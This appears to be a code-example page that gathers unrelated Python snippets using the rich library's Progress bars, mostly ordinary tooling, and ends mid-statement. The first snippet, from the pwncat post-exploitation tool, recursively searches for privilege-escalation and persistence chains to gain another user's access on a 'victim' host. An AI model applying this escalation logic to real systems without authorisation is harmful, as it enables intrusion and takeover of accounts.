Esempio n. 1
0
    def _escalate(
        self,
        progress: Progress,
        target_user: str = None,
        exclude: Optional[List[str]] = None,
        depth: int = None,
        chain: List["Technique"] = None,
        starting_user=None,
    ) -> List[Tuple["Technique", str]]:
        """ Search for a technique chain which will gain access as the given
        user. """

        if chain is None:
            chain = []

        if exclude is None:
            exclude = []

        if target_user is None:
            target_user = "******"

        # Add a new task to this privesc progress
        task = progress.add_task(
            "description",
            from_user=pwncat.victim.whoami(),
            to_user=target_user,
            status="persistence",
            step="",
            total=40,
        )

        current_user = pwncat.victim.current_user
        if (target_user == current_user.name or current_user.id == 0
                or current_user.name == "root"):
            raise PrivescError(f"you are already {current_user.name}")

        if starting_user is None:
            starting_user = current_user

        if depth is not None and len(chain) > depth:
            raise PrivescError("max depth reached")

        # Capture current shell level
        shlvl = pwncat.victim.getenv("SHLVL")

        installed = list(pwncat.victim.persist.installed)

        # Check if we have a persistence method for this user
        for user, persist in installed:
            if not persist.local or (user != target_user and user is not None):
                continue
            progress.update(task, step=str(persist))
            # Attempt to escalate with the local persistence method
            if persist.escalate(target_user):

                # Stabilize the terminal
                pwncat.victim.reset(hard=False)

                # The method thought it worked, but didn't appear to
                if pwncat.victim.update_user() != target_user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                # It worked!
                chain.append(
                    (f"persistence - {persist.format(target_user)}", "exit"))
                return chain

        # We update the status to enumerating and move the progress forward
        # but also stop the task to show the "pulsating" bar. This is because
        # we don't have a way of known how many things we will enumerate.
        progress.update(task, status="enumerating", step="initializing")

        # Enumerate escalation options for this user
        techniques = {}
        for method in self.methods:
            if method.id in exclude:
                continue
            try:
                found_techniques = method.enumerate(
                    progress,
                    task,
                    Capability.SHELL | Capability.WRITE | Capability.READ,
                )
                for tech in found_techniques:
                    progress.update(task, step=str(tech))
                    if tech.user not in techniques:
                        techniques[tech.user] = []
                    techniques[tech.user].append(tech)
            except PrivescError:
                pass

        # Try to escalate directly to the target if possible
        if target_user in techniques:
            progress.update(task,
                            status="escalating",
                            step="[yellow]direct escalation[/yellow]")
            try:
                tech, exit_command = self.escalate_single(
                    techniques[target_user], shlvl, progress, task)
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
                chain.append((tech, exit_command))
                return chain
            except PrivescError:
                pass

        # Try to use persistence as other users
        progress.update(task, status="persistence", step="initializing")
        for user, persist in installed:
            if self.in_chain(user, chain):
                continue
            progress.update(task, step=persist.format(user))
            if persist.escalate(user):

                # Ensure history and prompt are correct
                pwncat.victim.reset()

                # Update the current user
                if pwncat.victim.update_user() != user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                chain.append((f"persistence - {persist.format(user)}", "exit"))

                try:
                    return self._escalate(progress, target_user, exclude,
                                          depth, chain, starting_user)
                except PrivescError:
                    chain.pop()
                    pwncat.victim.run("exit", wait=False)

                # Don't retry later
                if user in techniques:
                    del techniques[user]

        progress.update(task, status="recursing")

        # We can't escalate directly to the target. Instead, try recursively
        # against other users.
        for user, techs in techniques.items():
            if user == target_user:
                continue
            if self.in_chain(user, chain):
                continue
            try:
                progress.update(task,
                                step=f"escalating to [green]{user}[/green]")
                tech, exit_command = self.escalate_single(
                    techs, shlvl, progress, task)

                chain.append((tech, exit_command))
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
            except PrivescError:
                continue
            try:
                progress.update(
                    task, step=f"success, recursing as [green]{user}[/green]")
                return self._escalate(progress, target_user, exclude, depth,
                                      chain, starting_user)
            except PrivescError:
                tech, exit_command = chain[-1]
                pwncat.victim.run(exit_command, wait=False)
                chain.pop()

        raise PrivescError(f"no route to {target_user} found")
Esempio n. 2
0
    def __init__(
        self,
        project: str = None,
        break_on_fail: bool = False,
        get_all: bool = False,
        source: tuple = (),
        source_path_file: pathlib.Path = None,
        destination: pathlib.Path = pathlib.Path(""),
        silent: bool = False,
        verify_checksum: bool = False,
        method: str = "get",
        no_prompt: bool = False,
        token_path: str = None,
    ):
        """Handle actions regarding downloading data."""
        # Initiate DDSBaseClass to authenticate user
        super().__init__(
            project=project,
            dds_directory=destination,
            method=method,
            no_prompt=no_prompt,
            token_path=token_path,
        )

        # Initiate DataGetter specific attributes
        self.break_on_fail = break_on_fail
        self.verify_checksum = verify_checksum
        self.silent = silent
        self.filehandler = None

        # Only method "get" can use the DataGetter class
        if self.method != "get":
            raise dds_cli.exceptions.InvalidMethodError(
                attempted_method=self.method,
                message="DataGetter attempting unauthorized method",
            )

        # Start file prep progress
        with Progress(
            "[bold]{task.description}",
            SpinnerColumn(spinner_name="dots12", style="white"),
            console=dds_cli.utils.stderr_console,
        ) as progress:
            wait_task = progress.add_task("Collecting and preparing data", step="prepare")
            self.filehandler = fhr.RemoteFileHandler(
                get_all=get_all,
                user_input=(source, source_path_file),
                token=self.token,
                project=self.project,
                destination=self.dds_directory.directories["FILES"],
            )

            if self.filehandler.failed and self.break_on_fail:
                raise dds_cli.exceptions.DownloadError(
                    ":warning-emoji: Some specified files were not found in the system "
                    "and '--break-on-fail' flag used. :warning-emoji:"
                    f"Files not found: {self.filehandler.failed}"
                )

            if not self.filehandler.data:
                if self.temporary_directory and self.temporary_directory.is_dir():
                    LOG.debug(f"Deleting temporary folder {self.temporary_directory}.")
                    dds_cli.utils.delete_folder(self.temporary_directory)
                raise dds_cli.exceptions.DownloadError("No files to download.")

            self.status = self.filehandler.create_download_status_dict()

            progress.remove_task(wait_task)
Esempio n. 3
0
def event(jid="all", tag=None, progress="log", stop_signal=None):
    """
    Function to listen to events emitted by Nornir Proxy Minions. Matched
    event printed to terminal.

    :param tag: (str) tag regex string, default is ``nornir\-proxy/.*``
    :param jid: (int, str) Job ID to listen events for, default is ``all``
    :param progress: (str) progress display mode - ``log``, ``raw``, ``bars``, ``tree``
    :param stop_signal: (obj) thread Event object, stops listening to events if ``stop_signal.is_set()``,
        if ``stop_signal is None``, listens and print events until keyboard interrupt hit - ``ctrl+c``

    ``bars`` and ``tree`` progress display modes use Rich library, to properly display various
    symbols and characters need to make sure to use utf-8 encoding for your environment for example
    by running these commands::

        [root@salt-master ~]# PYTHONIOENCODING=utf-8
        [root@salt-master ~]# export PYTHONIOENCODING
    """
    # start rich console
    globals().setdefault("console", Console())

    stop_signal = stop_signal or Event()
    events_queue = queue.Queue()
    tag = (
        tag
        if tag
        else (
            r"nornir\-proxy\/.*"
            if jid == "all"
            else r"nornir\-proxy\/{jid}\/.*".format(jid=jid)
        )
    )
    # start events thread
    listen_events_thread = Thread(
        target=_get_salt_nornir_event,
        kwargs={"stop_signal": stop_signal, "tag": tag, "events_queue": events_queue},
        daemon=True,  # to not block once main process finishes
    )
    listen_events_thread.start()
    # display events
    if HAS_RICH and progress == "bars":
        tasks = {}
        stop_events_loop = Event()
        rich_progress = Progress(
            TextColumn("{task.description}"),
            BarColumn(),
            TextColumn("{task.percentage:>3.0f}%"),
            TextColumn("{task.completed}/{task.total}"),
            TimeElapsedColumn(),
            TextColumn("{task.fields[info]}"),
            TextColumn("{task.fields[status]}"),
            refresh_per_second=5,
        )
        # listen to events indefinitely if stop_signal is None
        with rich_progress:
            while True:
                try:
                    e = events_queue.get(timeout=1)
                except queue.Empty:
                    continue
                finally:
                    # check if need to finish
                    if stop_signal.is_set() and all(
                        [t.finished for t in rich_progress.tasks]
                    ):
                        stop_events_loop.set()
                        break
                edata = e["data"]
                jid = edata["jid"]
                task_type = edata["task_type"]
                task_event = edata["task_event"]
                status = edata["status"]
                task_name = edata["task_name"]
                status_str = (
                    f"[red]{status}" if status == "FAILED" else f"[green]{status}"
                )
                description_str = (
                    "[blue]{timestamp}[/]:{user}:{jid}:[bright_magenta]{function}[/]"
                )
                # catch task started events and add new progress bar
                if task_type == "task" and task_event == "started":
                    # if job runs on multiple proxy minions
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        task.total += len(edata["hosts"])
                        rich_progress.update(tasks[jid])
                    else:
                        total = len(edata["hosts"])
                        description = description_str.format(**edata)
                        info = "[cyan]{}[/]:{}".format(
                            task_type, task_name.split(".")[-1]
                        )
                        tasks[jid] = rich_progress.add_task(
                            description, total=total, info=info, status=status
                        )
                # catch task instance end events to advance progress bar
                elif task_type == "task_instance" and task_event == "completed":
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        if status == "PASSED":
                            rich_progress.update(tasks[jid], advance=1)
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[jid]].fields[
                                "status"
                            ] = status_str
                elif task_type == "task" and task_event == "completed":
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[jid]].fields[
                                "status"
                            ] = status_str
                        rich_progress.stop_task(tasks[jid])
                        # stop all subtasks for this jid and update their status
                        for task in tasks:
                            if task.startswith(jid):
                                rich_progress.tasks[tasks[task]].fields[
                                    "status"
                                ] = status_str
                                rich_progress.stop_task(tasks[task])
                # handle subtask progress
                elif task_type == "subtask" and task_event == "started":
                    tid = "{jid}:{task_name}".format(**edata)
                    if tid not in tasks and jid in tasks:
                        total = rich_progress.tasks[tasks[jid]].total
                        description = description_str.format(**edata)
                        info = "[cyan]{task_type}[/]:{task_name}".format(**edata)
                        tasks[tid] = rich_progress.add_task(
                            description, total=total, info=info, status=status
                        )
                    # update task total if got additional start events
                    elif tid in tasks and jid in tasks:
                        task = rich_progress.tasks[tasks[tid]]
                        task.total = rich_progress.tasks[tasks[jid]].total
                        rich_progress.update(tasks[tid])
                elif task_type == "subtask" and task_event == "completed":
                    tid = "{jid}:{task_name}".format(**edata)
                    if tid in tasks:
                        task = rich_progress.tasks[tasks[tid]]
                        if status == "PASSED":
                            rich_progress.update(tasks[tid], advance=1)
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[tid]].fields[
                                "status"
                            ] = status_str
                # hide tasks beyond vertical overflow point
                hght = console.size.height - 2
                for tindx, _ in enumerate(rich_progress.tasks[:-hght]):
                    rich_progress.update(tindx, visible=False)
    elif progress == "tree":
        pass
    elif progress == "raw":
        while not stop_signal.is_set():
            try:
                e = events_queue.get(timeout=1)
                print(e)
            except queue.Empty:
                continue
    # handle 'log' progress mode
    else:
        while not stop_signal.is_set():
            try:
                e = events_queue.get(timeout=1)
            except queue.Empty:
                continue
            edata = e["data"]
            # form message string and print it
            if edata["task_type"] == "task":
                edata["hs"] = ", ".join(edata["hosts"])
            elif edata["task_type"] in ["task_instance", "subtask"]:
                edata["hs"] = edata["host"]
            msg = "{timestamp}:{user}:{jid}:{proxy_id}:w{worker_id} {function} {hs} {task_type} {task_event} {task_name}; {status}"
            print(msg.format(**edata))
Esempio n. 4
0
def test_live_is_not_started_if_progress_is_disabled() -> None:
    progress = Progress(auto_refresh=False, disable=True)

    with progress:
        assert not progress.live._started
Esempio n. 5
0
from rich.console import Console
from rich.theme import Theme

custom_theme = Theme({
    "success": "bold blue",
    "fail": "bold red",
    "error": "bold yellow",
    "repr.str": "bold white",
    #"repr.number": "bold green", # defaults: python -m rich.theme
})
console = Console(theme=custom_theme)
total_dev = 4
progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(),
    "[progress.percentage]{task.percentage:>3.0f}%",
    TimeRemainingColumn(),
    "{task.completed} of {task.total}",
    console=console,
)
t1 = progress.add_task("Пингую...", total=total_dev)
t2 = progress.add_task("Успешное подключение...", total=total_dev)
t3 = progress.add_task("Ошибка при подключении...", total=total_dev)


def ping_ip(ip):
    param = "-n" if system_name().lower() == "windows" else "-c"
    command = ["ping", param, "3", ip]
    reply = subprocess.run(command,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
    progress.update(t1, advance=1)
Esempio n. 6
0
    def do_one_mod(self, names: List[str], infer: bool, exec_: bool,
                   conf: dict):
        """
        Crawl one modules and stores resulting docbundle in self.store.

        Parameters
        ----------
        names : List[str]
            list of (sub)modules names to generate docbundle for.
            The first is considered the root module.
        infer : bool
            Wether to run type inference with jedi.
        exec_ : bool
            Wether to try to execute the code blocks and embed resulting values like plots.
        """

        p = lambda: Progress(
            TextColumn("[progress.description]{task.description}",
                       justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "[progress.completed]{task.completed} / {task.total}",
            TimeElapsedColumn(),
        )
        # step one collect all the modules instances we want to analyse.

        modules = []
        for name in names:
            x, *r = name.split(".")
            n0 = __import__(name)
            for sub in r:
                n0 = getattr(n0, sub)
            modules.append(n0)

        # step 2 try to guess the version number from the top module.
        version = getattr(modules[0], "__version__", "???")

        root = names[0].split(".")[0]
        module_conf = conf.get(root, {})
        examples_folder = module_conf.get("examples_folder", None)
        print("EF", examples_folder)
        if examples_folder is not None:
            examples_folder = Path(examples_folder).expanduser()
            examples_data = self.collect_examples(examples_folder)
            for edoc, figs in examples_data:
                self.examples.update(
                    {k: json.dumps(v.to_json())
                     for k, v in edoc.items()})
                for name, data in figs:
                    print("put one fig", name)
                    self.put_raw(name, data)
        print("Configuration:", json.dumps(module_conf, indent=2))
        self.root = root
        self.version = version
        subs = module_conf.get("submodules", [])
        extra_from_conf = [root + "." + s for s in subs]
        for name in extra_from_conf:
            x, *r = name.split(".")
            n0 = __import__(name)
            for sub in r:
                n0 = getattr(n0, sub)
            modules.append(n0)

        # print(modules)

        collector = DFSCollector(modules[0], modules[1:])
        collected: Dict[str, Any] = collector.items()

        # collect all items we want to document.
        for qa, item in collected.items():
            if (nqa := full_qual(item)) != qa:
                print("after import qa differs : {qa} -> {nqa}")
                if collected[nqa] == item:
                    print("present twice")
                    del collected[nqa]
                else:
                    print("differs: {item} != {other}")
Esempio n. 7
0
def make_progress() -> Progress:
    _time = 0.0

    def fake_time():
        nonlocal _time
        try:
            return _time
        finally:
            _time += 1

    console = Console(
        file=io.StringIO(),
        force_terminal=True,
        color_system="truecolor",
        width=80,
        legacy_windows=False,
        _environ={},
    )
    progress = Progress(console=console,
                        get_time=fake_time,
                        auto_refresh=False)
    task1 = progress.add_task("foo")
    task2 = progress.add_task("bar", total=30)
    progress.advance(task2, 16)
    task3 = progress.add_task("baz", visible=False)
    task4 = progress.add_task("egg")
    progress.remove_task(task4)
    task4 = progress.add_task("foo2", completed=50, start=False)
    progress.stop_task(task4)
    progress.start_task(task4)
    progress.update(task4,
                    total=200,
                    advance=50,
                    completed=200,
                    visible=True,
                    refresh=True)
    progress.stop_task(task4)
    return progress
Esempio n. 8
0
def staticproc(name: str, process):
    """For processes where progress can not be determined"""
    with Progress(f"[magenta]{name}...", BarColumn()) as progress:
        task = progress.add_task(name, start=False)
        process()
Esempio n. 9
0
def process_file(filename: Path, threshold, delete):
    if filename.suffix == ".zst":
        logging.info(f'"{filename}" is already compressed')
        return

    compr_file_name = get_compressed_file_name(filename)
    if compr_file_name.exists() and compr_file_name.is_file():
        logging.info(
            f'"{filename}" already has a compressed copy, "{compr_file_name}"')
        return

    json_file_name = get_json_file_name(filename)

    try:
        with json_file_name.open("rt") as inpf:
            compr_info = json.load(inpf)

        # We were able to find the file and read it, so it means there is
        # no need to process the file.
        logging.info(
            f'"{filename}" was already been tested ({compr_info["compression_ratio"]:.1f}%)'
        )
        return
    except Exception:
        pass

    buf = BytesIO()
    uncompr_len = filename.stat().st_size

    with Progress() as progress:
        task = progress.add_task(filename.name, total=uncompr_len)

        def callback(total_input, total_output, read_data, write_data):
            progress.update(task, completed=total_input)

        with filename.open("rb") as inpf:
            pyzstd.compress_stream(
                inpf,
                buf,
                level_or_option=9,
                callback=callback,
                read_size=13_107_200,
                write_size=13_159_100,
            )

    compr_len = len(buf.getvalue())
    compr_ratio = compr_len / uncompr_len * 100
    logging.info(
        f'"{filename}": {uncompr_len} → {compr_len} ({compr_ratio:.2f}%)')

    if compr_ratio < threshold:
        compr_filename = Path(str(filename) + ".zst")
        with compr_filename.open("wb") as outf:
            outf.write(buf.getvalue())
        logging.info(f'File "{compr_filename}" has been written')

        if delete:
            filename.unlink()
            logging.info(f'File "{filename}" was deleted')

    with open(json_file_name, "wt") as outf:
        json.dump(
            {
                "uncompressed_size": uncompr_len,
                "compressed_size": compr_len,
                "filename": str(filename),
                "compression_ratio": compr_ratio,
                "date": str(datetime.now()),
            },
            outf,
        )
Esempio n. 10
0
class Video:
    def __init__(self, src: str):
        self.src = src
        is_webcam = lambda x: isinstance(x, int)
        self.display = 'webcam' if is_webcam(src) \
            else osp.basename(src)

        # Read Input Video
        self.video_capture = cv2.VideoCapture(src)
        if not self.video_capture.isOpened:
            self._fail(
                f"[bold red]Error:[/bold red] '{self.src}' does not seem to be a video file supported by OpenCV. If the video file is not the problem, please check that your OpenCV installation is working correctly."
            )
        self.total_frames = 0 if is_webcam(src) \
            else int(self.video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
        self.frame_cnt = 0

        description = 'Run'
        # Setup progressbar
        if self.display:
            description += f" | {self.display}"

        progress_bar_fields: List[Union[str, ProgressColumn]] = [
            "[progress.description]{task.description}",
            BarColumn(),
            "[yellow]{task.fields[process_fps]:.2f}fps[/yellow]",
        ]
        progress_bar_fields.insert(
            2, "[progress.percentage]{task.percentage:>3.0f}%")
        progress_bar_fields.insert(
            3,
            TimeRemainingColumn(),
        )
        self.progress_bar = Progress(
            *progress_bar_fields,
            auto_refresh=False,
            redirect_stdout=False,
            redirect_stderr=False,
        )
        self.task = self.progress_bar.add_task(
            self.abbreviate_description(description),
            total=self.total_frames,
            start=self.src,
            process_fps=0,
        )

    # This is a generator, note the yield keyword below.
    def __iter__(self):
        with self.progress_bar as progress_bar:
            start = time.time()
            # Iterate over video
            while True:
                self.frame_cnt += 1
                ret, img = self.video_capture.read()
                if ret is False or img is None:
                    break
                self.fps = self.frame_cnt / (time.time() - start)
                progress_bar.update(self.task,
                                    advance=1,
                                    refresh=True,
                                    process_fps=self.fps)
                yield img
            self.stop()

    def stop(self):
        self.frame_cnt = 0
        self.video_capture.release()
        cv2.destroyAllWindows()

    def _fail(self, msg: str):
        print(msg)
        exit()

    def show(self,
             frame: np.array,
             winname: str = 'show',
             downsample_ratio: float = 1.0):
        # Resize to lower resolution for faster streaming over slow connections
        if self.frame_cnt == 1:
            cv2.namedWindow(winname, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)
            cv2.resizeWindow(winname, 640, 480)
            cv2.moveWindow(winname, 20, 20)

        if downsample_ratio != 1.0:
            frame = cv2.resize(
                frame,
                (
                    frame.shape[1] // downsample_ratio,
                    frame.shape[0] // downsample_ratio,
                ),
            )
        cv2.imshow(winname, frame)
        return cv2.waitKey(1)

    def get_writer(self, frame, output_path, fps=20):
        output_path = osp.join(
            output_path, osp.splitext(osp.basename(self.src))[0]+'.avi') \
            if output_path[-4:] != '.avi' else output_path
        fourcc = cv2.VideoWriter_fourcc(*"XVID")
        output_size = (frame.shape[1], frame.shape[0]
                       )  # OpenCV format is (width, height)
        writer = cv2.VideoWriter(output_path, fourcc, fps, output_size)
        print(f'[INFO] Writing output to {output_path}')
        return writer

    def get_output_file_path(self, output_folder, suffix: List = []) -> str:
        os.makedirs(output_folder, exist_ok=True)
        filename = '{}_' * (len(suffix) + 1)
        filename = filename.format(
            'webcam'
            if isinstance(self.src, int) else osp.splitext(self.display)[0],
            *iter(suffix))
        output_path = osp.join(output_folder, f'{filename[:-1]}.avi')
        return output_path

    def abbreviate_description(self, description: str) -> str:
        """Conditionally abbreviate description so that progress bar fits in small terminals"""
        terminal_columns, _ = get_terminal_size()
        space_for_description = (int(terminal_columns) - 25
                                 )  # Leave 25 space for progressbar
        if len(description) < space_for_description:
            return description
        else:
            return "{} ... {}".format(
                description[:space_for_description // 2 - 3],
                description[-space_for_description // 2 + 3:],
            )
Esempio n. 11
0
def install_conda_env(destination,
                      binary=None,
                      auto_add_kernels=True,
                      config=None,
                      console=None):

    destination = os.path.expanduser(destination)

    if not config:
        config = Config()

    if not console:
        console = Console()

    console.print("Update config...")
    des_abspath = os.path.abspath(destination)
    if not config.home_path:
        # overwrite the CHEMCONDA_HOME_PATH in the ~/.chemconda/config.yaml file
        config.home_path = des_abspath
        config.installer = binary
    else:
        if config.home_path != os.path.abspath(destination):
            # overwrite the CHEMCONDA_HOME_PATH in the ~/.chemconda/config.yaml file
            config.home_path = des_abspath

    console.print("Config completed:")
    console.print(config.args_dict())

    console.print("Setup Miniconda...")
    # validate CHEMCONDA_HOME_PATH is consistent to the config.home_path
    if not os.path.exists(config.home_path):
        # install Miniconda3 from remote repository
        conda_download_url = os.path.join(config.remote_repo, config.installer)

        console.print(
            "Cannot find Miniconda installer, downloading from {}".format(
                conda_download_url))
        res = requests.get(conda_download_url,
                           stream=True,
                           allow_redirects=True)
        total_length = res.headers.get('content-length')

        done_event = Event()

        def handle_sigint(signum, frame):
            done_event.set()

        signal.signal(signal.SIGINT, handle_sigint)

        with open(config.installer_path, 'wb') as fw:
            if total_length is None:  # no content length header
                fw.write(res.content)
            else:
                dl = 0
                total_length = int(total_length)
                with Progress() as progress:
                    download_task = progress.add_task("[green]Downloading...",
                                                      total=total_length)
                    for data in res.iter_content(chunk_size=32768):
                        fw.write(data)
                        progress.update(download_task, advance=len(data))
                        if done_event.is_set():
                            return

        console.print("Downloading completed : {}".format(
            config.installer_path))

        console.print("Installing {}...".format(config.installer))
        if os.path.isfile(config.installer_path):
            # ensure bash installed
            os.system("bash {} -b -p {}".format(config.installer_path,
                                                config.home_path))
        console.print("Installing completed.")

        console.print("Start installing base dependencies...")
        # install sidecar in the base env
        install_packages(package_names=['jedi=0.18', 'mamba'],
                         env_name='base',
                         add_channels=['conda-forge'],
                         config=config,
                         console=console)
        console.print("Installing completed.")

        # show the installed Minconda3 home path
        console.print("Setup completed: conda installed at {}".format(
            config.home_path),
                      style="bold white")
    else:
        if auto_add_kernels:
            # search the config.home_path/envs/ folder to get all the potential kernels.
            env_names = [
                os.path.basename(dirpath)
                for dirpath in glob(os.path.join(config.home_path, 'envs/*'))
            ]
            console.print("Found {} kernels, start to restore...".format(
                len(env_names)))
            for env_name in env_names:
                console.print("Adding kernel {}".format(env_name))
                add_existed_kernel(env_name, config=config, console=console)
            console.print("All kernels have been added.")
Esempio n. 12
0
def _dayone(data: List[DayOneStats]):
    stats_sorted: List[DayOneStats] = sorted(data, key=lambda d: d.Date)
    oldest_stats: DayOneStats = min(data, key=lambda d: d.Date)
    latest_stats: DayOneStats = max(data, key=lambda d: d.Date)

    def get_deltas(stat: str) -> Iterator[int]:
        deltas = [
            getattr(j, stat) - getattr(i, stat)
            for i, j in zip(stats_sorted[:-1], stats_sorted[1:])
        ]

        return iter(deltas)

    def get_dates() -> Iterator[datetime]:
        dates = [s.Date for s in stats_sorted]

        return iter(dates)

    prog_tmpl = (
        "{task.description}",
        BarColumn(),
        "[progress.completed]{task.completed}",
        DayOneStatDateColumn(),
    )

    stat_dates = get_dates()

    first_date = next(stat_dates)

    all_deltas = zip(
        stat_dates,
        get_deltas("confirmed"),
        get_deltas("deaths"),
        get_deltas("recovered"),
        get_deltas("active"),
    )

    first_case_date = oldest_stats.Date.strftime("%b %d %Y")

    HEADER = f"""
    [bold]Stats for [white]{latest_stats.country}[/white][/bold]

    Stats from first recorded case on [cyan]{first_case_date}[/] to date

    Progress bar shows how fast cases by each case type increased over time.
    """

    console.print(Panel(HEADER))

    with Progress(*prog_tmpl) as progress:
        date_task = progress.add_task("Date",
                                      total=len(stats_sorted) - 1,
                                      stat_date=first_date)

        confirmed_task = progress.add_task(
            "[cyan]Confirmed Cases...[/]",
            total=latest_stats.confirmed,
        )
        death_task = progress.add_task("[red]Deaths...",
                                       total=latest_stats.deaths)
        recovered_task = progress.add_task("[green]Recovered.Cases..",
                                           total=latest_stats.recovered)
        active_task = progress.add_task("[yellow]Active Cases...",
                                        total=latest_stats.active)

        for stat_date, confirmed_delta, death_delta, recovered_delta, active_delta in all_deltas:
            progress.update(date_task, advance=1, stat_date=stat_date)

            progress.update(confirmed_task, advance=confirmed_delta)
            progress.update(death_task, advance=death_delta)
            progress.update(recovered_task, advance=recovered_delta)
            progress.update(active_task, advance=active_delta)

            time.sleep(0.2)
Esempio n. 13
0
def exec_tool(  # scan:ignore
        tool_name,
        args,
        cwd=None,
        env=utils.get_env(),
        stdout=subprocess.DEVNULL):
    """
    Convenience method to invoke cli tools

    Args:
      tool_name Tool name
      args cli command and args
      cwd Current working directory
      env Environment variables
      stdout stdout configuration for run command

    Returns:
      CompletedProcess instance
    """
    with Progress(
            console=console,
            redirect_stderr=False,
            redirect_stdout=False,
            refresh_per_second=1,
    ) as progress:
        task = None
        try:
            env = use_java(env)
            LOG.debug('⚡︎ Executing {} "{}"'.format(tool_name, " ".join(args)))
            stderr = subprocess.DEVNULL
            if LOG.isEnabledFor(DEBUG):
                stderr = subprocess.STDOUT
            tool_verb = "Scanning with"
            if "init" in tool_name:
                tool_verb = "Initializing"
            elif "build" in tool_name:
                tool_verb = "Building with"
            task = progress.add_task("[green]" + tool_verb + " " + tool_name,
                                     total=100,
                                     start=False)
            cp = subprocess.run(
                args,
                stdout=stdout,
                stderr=stderr,
                cwd=cwd,
                env=env,
                check=False,
                shell=False,
                encoding="utf-8",
            )
            if cp and stdout == subprocess.PIPE:
                for line in cp.stdout:
                    progress.update(task, completed=5)
            if (cp and LOG.isEnabledFor(DEBUG) and cp.returncode
                    and cp.stdout is not None):
                LOG.debug(cp.stdout)
            progress.update(task, completed=100, total=100)
            return cp
        except Exception as e:
            if task:
                progress.update(task, completed=20, total=10, visible=False)
            if not LOG.isEnabledFor(DEBUG):
                LOG.info(
                    f"{tool_name} has reported few errors. To view, pass the environment variable SCAN_DEBUG_MODE=debug"
                )
            LOG.debug(e)
            return None
Esempio n. 14
0
def get_datacloud_catalogue(id_ssodnet, catalogue, progress=False, local=True):
    """Retrieve the datacloud catalogue of one or many asteroids, using their SsODNet IDs.

    Parameters
    ----------
    id_ssodnet : str, list, np.ndarray, pd.series
        The ssodnet id of the asteroid. Can be one or many.
    catalogue : str, list of str
        The name of the datacloud catalogue to retrieve. Can be one or many.
    progress : bool
        Show progressbar. Default is False.
    local : bool
        If False, forces the remote query of the ssoCard. Default is True.

    Returns
    -------
    list of dict, list of list of dict
        list containing len(catalogue) dictionaries corresponding to
        the catalogues of the passed identifier. If the catalogue is
        not available, the dict is empty.
    progress : bool or tdqm.std.tqdm
       If progress is True, this is a progress bar instance. Else, it's False.

    Notes
    -----
    Catalogue retrieval is first attempted locally, then remotely via datacloud.
    """
    if isinstance(id_ssodnet, str):
        id_ssodnet = [id_ssodnet]
    elif isinstance(id_ssodnet, pd.Series):
        id_ssodnet = id_ssodnet.values
    elif isinstance(id_ssodnet, (set, tuple)):
        id_ssodnet = list(id_ssodnet)
    elif id_ssodnet is None:
        warnings.warn(f"Received SsODNet ID of type {type(id_ssodnet)}.")
        return [(None, np.nan, None)]
    elif not isinstance(id_ssodnet, (list, np.ndarray)):
        raise TypeError(
            f"Received SsODNet ID of type {type(id_ssodnet)}, expected one of: "
            "str, list, np.ndarray, pd.Series")

    if isinstance(catalogue, str):
        catalogue = [catalogue]
    elif not isinstance(catalogue, (list, np.ndarray)):
        raise TypeError(
            f"Received catalogue of type {type(catalogue)}, expected one of: "
            "str, list, np.ndarray")

    # Flatten input for easier calling
    id_catalogue = list(product(id_ssodnet, catalogue))

    with Progress(disable=not progress) as progress_bar:

        progress = progress_bar.add_task(
            "Getting catalogues" if len(catalogue) > 1 else catalogue[0],
            total=len(id_catalogue),
        )

        # Run async loop to get ssoCard
        loop = asyncio.get_event_loop()
        catalogues = loop.run_until_complete(
            _get_datacloud_catalogue(id_catalogue, progress_bar, progress,
                                     local))[0]

    return catalogues
Esempio n. 15
0
def query(
    params,
    remote,
    query,
    level,
    query_res,
    since,
    before,
    local,
    out_format,
    assume_yes,
    no_progress,
):
    """Perform a query against a network node"""
    if level is not None:
        level = level.upper()
        for q_lvl in QueryLevel:
            if q_lvl.name == level:
                level = q_lvl
                break
        else:
            cli_error("Invalid level: %s" % level)
    if query_res is None and not sys.stdin.isatty():
        log.debug("Reading query_res from stdin")
        query_res = sys.stdin
    if query_res is not None:
        in_str = query_res.read()
        if in_str:
            query_res = json_serializer.loads(in_str)
        else:
            query_res = None

    if sys.stdout.isatty():
        if out_format is None:
            out_format = "tree"
    else:
        no_progress = True
        if out_format is None:
            out_format = "json"
    if out_format not in ("tree", "json"):
        cli_error("Invalid out-format: %s" % out_format)
    local = params["config"].get_local_node(local)
    remote_node = params["config"].get_remote_node(remote)
    net_ent = LocalEntity(local)
    qdat = _build_query(query, since, before)
    if len(qdat) == 0 and query_res is None and not assume_yes:
        if not click.confirm("This query hasn't been limited in any "
                             "way and may generate a huge result, "
                             "continue?"):
            return
    with ExitStack() as estack:
        if not no_progress:
            prog = RichProgressHook(
                estack.enter_context(
                    Progress(console=params["rich_con"], transient=True)))
            report = MultiListReport(description="query", prog_hook=prog)
        else:
            report = MultiListReport(description="query")

        qr = asyncio.run(
            net_ent.query(remote_node, level, qdat, query_res, report=report))
    if out_format == "tree":
        out = qr.to_tree()
    elif out_format == "json":
        out = json_serializer.dumps(qr, indent=4)
    click.echo(out)
    report.log_issues()
Esempio n. 16
0
COLUMNS = [
    BarColumn(bar_width=None),
    "Completed: ",
    TextColumn("[bold magenta]Completed {task.completed}/{task.total}"),
    "[progress.percentage]{task.percentage:>3.0f}%",
    "•",
    "Speed: ",
    SpeedColumn(),
    "•",
    "Remaining: ",
    TimeRemainingColumn(),
    "Elpsed: ",
    TimeElapsedColumn(),
]

progress = Progress(*COLUMNS, transient=False,)

progess_with_description = Progress(
